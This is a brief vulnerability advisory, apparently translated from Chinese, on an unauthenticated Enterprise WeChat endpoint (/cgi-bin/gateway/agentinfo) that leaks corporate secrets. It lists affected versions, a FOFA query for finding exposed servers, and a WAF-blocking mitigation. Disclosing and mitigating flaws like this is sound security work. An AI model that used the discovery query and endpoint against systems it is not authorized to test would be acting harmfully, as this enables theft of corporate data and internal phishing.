2023 Enterprise WeChat 0day Vulnerability Reappearance and Handling Suggestions

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Vulnerability overview

Vulnerability Number: None

The enterprise WeChat 0day vulnerability can directly obtain sensitive information such as the enterprise WeChat secret without authorization of the /cgi-bin/gateway/agentinfo interface, which can lead to the acquisition of the entire amount of enterprise WeChat data.

Vulnerability hazard

① It can lead to the acquisition of the full amount of corporate WeChat data and documents,

②There are risks such as sending phishing files and links internally by using enterprise WeChat light applications.

2. Affected version

Affected versions: 2.5.x, 2.6.930000 and below

Unaffected: 2.7.x, 2.8.x, 2.9.x;

3. Vulnerability recurrence

FOFA syntax: app="Tencent-Enterprise WeChat"

The access path here is: https://xx.xx.xx.xx/cgi-bin/gateway/agentinfo This access format.

Xiaolong POC detection script:

Xiaolong POC portal: Xiaolong POC tool

4. Comments on rectification

① Wait for the official upgrade. Currently still belongs to 0day

②If the interface is not authorized, sensitive information such as corporate WeChat secrets can be obtained directly, which can lead to the acquisition of the full amount of corporate WeChat data. Temporary risk mitigation measures such as file acquisition and internal force sending of phishing files and links using corporate WeChat light applications are to/ cgi-bin.gateway/agentinfo is blocked on the WAF. For details, please contact the enterprise WeChat team for emergency response. All units are requested to strengthen prevention.